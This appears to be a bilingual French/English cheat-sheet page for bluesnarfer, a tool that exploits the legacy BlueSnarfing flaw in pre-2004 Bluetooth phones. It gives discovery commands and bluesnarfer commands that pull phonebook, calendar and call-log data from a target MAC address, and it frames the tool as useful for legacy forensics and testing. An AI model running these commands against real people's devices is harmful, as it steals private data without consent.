bluesnarfer
Outil d'attaque par Bluetooth snarfing. Exploite la vulnérabilité BlueSnarfing des anciens appareils Bluetooth pour voler contacts du répertoire, entrées d'agenda et autres données à l'insu de l'utilisateur. Bluetooth snarfing attack tool. Exploits BlueSnarfing vulnerability in older Bluetooth devices to steal phonebook contacts, calendar entries, and other data without user awareness.
↗ https://github.com/Pkhex/bluesnarferOverview
Bluesnarfer exploits the BlueSnarfing vulnerability — a flaw in early Bluetooth implementations that allows unauthorized OBEX access to device data. Vulnerable devices (mainly pre-2004 phones) expose phonebooks, calendar, and messages without authentication.
Basic Usage
Connect and get phonebook
bluesnarfer -b 00:11:22:33:44:55 -r 1-100
Get specific phonebook entries
bluesnarfer -b 00:11:22:33:44:55 -f pb -r 1-50
Get calendar
bluesnarfer -b 00:11:22:33:44:55 -f cal
Get all available information
bluesnarfer -b 00:11:22:33:44:55 -f all
Available Data
Phonebook entries
bluesnarfer -b TARGET_MAC -f pb -r 1-200
Calendar entries
bluesnarfer -b TARGET_MAC -f cal
bluesnarfer -b TARGET_MAC -f cch # Missed calls
bluesnarfer -b TARGET_MAC -f ich # Incoming calls
bluesnarfer -b TARGET_MAC -f och # Outgoing calls
Options
-b MAC Target Bluetooth MAC address
-f TYPE File type: pb (phonebook), cal, all, cch, ich, och
-r START-END Range of entries to retrieve
-C CHAN RFCOMM channel (default: auto)
-i IFACE Bluetooth interface (default: hci0)
Understanding BlueSnarfing
# BlueSnarfing affects:
# Pre-2004 Bluetooth phones
# Devices with OBEX Push/Pull without authentication
# Affected vendors: Nokia, Sony Ericsson, some Samsung/Motorola
# Modern devices (post-2004 firmware updates) are NOT vulnerable
# This is primarily a historical/legacy device attack
# Similar attacks:
# Bluebugging — takes over phone functions
# Bluejacking — sends unsolicited messages
Discovery First
Discover nearby Bluetooth devices
hcitool scan
Get device info before attacking
hcitool info 00:11:22:33:44:55
Check Bluetooth class
btscanner -s 00:11:22:33:44:55
→ Device class 0x5A0204 = Smartphone
Tips
- BlueSnarfing affects very old devices — modern smartphones are not vulnerable
- Primary value today: legacy device forensics and old hardware security testing
- Use btscanner first to identify device type and manufacturer
- Channel auto-detection usually works; manually specify with
-Cif it fails - Document findings thoroughly — access to personal data has legal implications
Help / Man page
bluesnarfer [options]
-b MAC Target Bluetooth MAC address (required)
-f TYPE Data type: pb, cal, all, cch, ich, och
-r N-M Entry range (e.g., 1-100)
-C N RFCOMM channel
-i IFACE Bluetooth interface
Vue d’ensemble
Bluesnarfer exploite la vulnérabilité BlueSnarfing, une faille des premières implémentations Bluetooth qui autorise un accès OBEX non autorisé aux données de l’appareil. Les appareils vulnérables (principalement les téléphones d’avant 2004) exposent répertoire, agenda et messages sans authentification.
Utilisation de base
# Se connecter et récupérer le répertoire
bluesnarfer -b 00:11:22:33:44:55 -r 1-100
# Récupérer des entrées de répertoire spécifiques
bluesnarfer -b 00:11:22:33:44:55 -f pb -r 1-50
# Récupérer l'agenda
bluesnarfer -b 00:11:22:33:44:55 -f cal
# Récupérer toutes les informations disponibles
bluesnarfer -b 00:11:22:33:44:55 -f all
Données disponibles
# Entrées du répertoire
bluesnarfer -b TARGET_MAC -f pb -r 1-200
# Entrées de l'agenda
bluesnarfer -b TARGET_MAC -f cal
bluesnarfer -b TARGET_MAC -f cch # Appels manqués
bluesnarfer -b TARGET_MAC -f ich # Appels entrants
bluesnarfer -b TARGET_MAC -f och # Appels sortants
Options
-b MAC Target Bluetooth MAC address
-f TYPE File type: pb (phonebook), cal, all, cch, ich, och
-r START-END Range of entries to retrieve
-C CHAN RFCOMM channel (default: auto)
-i IFACE Bluetooth interface (default: hci0)
Comprendre le BlueSnarfing
# Le BlueSnarfing affecte :
# Les téléphones Bluetooth d'avant 2004
# Les appareils avec OBEX Push/Pull sans authentification
# Constructeurs concernés : Nokia, Sony Ericsson, certains Samsung/Motorola
# Les appareils modernes (mises à jour firmware d'après 2004) ne sont PAS vulnérables
# C'est avant tout une attaque sur du matériel historique/legacy
# Attaques similaires :
# Bluebugging : prend le contrôle des fonctions du téléphone
# Bluejacking : envoie des messages non sollicités
D’abord la découverte
# Découvrir les appareils Bluetooth proches
hcitool scan
# Récupérer les infos de l'appareil avant d'attaquer
hcitool info 00:11:22:33:44:55
# Vérifier la classe Bluetooth
btscanner -s 00:11:22:33:44:55
# → Classe d'appareil 0x5A0204 = Smartphone
Conseils
- Le BlueSnarfing affecte de très vieux appareils : les smartphones modernes ne sont pas vulnérables
- Intérêt principal aujourd’hui : forensique d’appareils legacy et test de sécurité de vieux matériels
- Utilisez d’abord btscanner pour identifier le type d’appareil et le constructeur
- L’auto-détection du canal fonctionne généralement ; spécifiez-le manuellement avec
-Cen cas d’échec - Documentez soigneusement vos découvertes : l’accès à des données personnelles a des implications légales
Aide / Page de manuel
bluesnarfer [options]
-b MAC Target Bluetooth MAC address (required)
-f TYPE Data type: pb, cal, all, cch, ich, och
-r N-M Entry range (e.g., 1-100)
-C N RFCOMM channel
-i IFACE Bluetooth interface